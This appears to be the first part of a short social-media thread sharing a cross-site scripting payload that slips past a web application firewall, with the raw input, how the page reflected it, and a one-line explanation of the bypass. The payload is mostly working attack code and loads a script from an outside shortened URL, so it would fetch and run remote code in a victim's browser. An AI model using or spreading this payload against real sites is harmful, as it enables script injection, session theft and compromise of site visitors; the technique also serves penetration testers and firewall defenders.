XSS WAF Bypass:

<img+a=’a+<!–‘+a=”>”‘+”<script+a+src=https://t.co/E3yJ50Hb6b>a</script>

Reflected as:
<img a=’a <!–‘ a=\”>\”‘ \”<script a src=https://t.co/E3yJ50Hb6b>a</script>

Explanation: Script tags don’t work inside a <img> tags so the WAF was allowing me to add them 1/2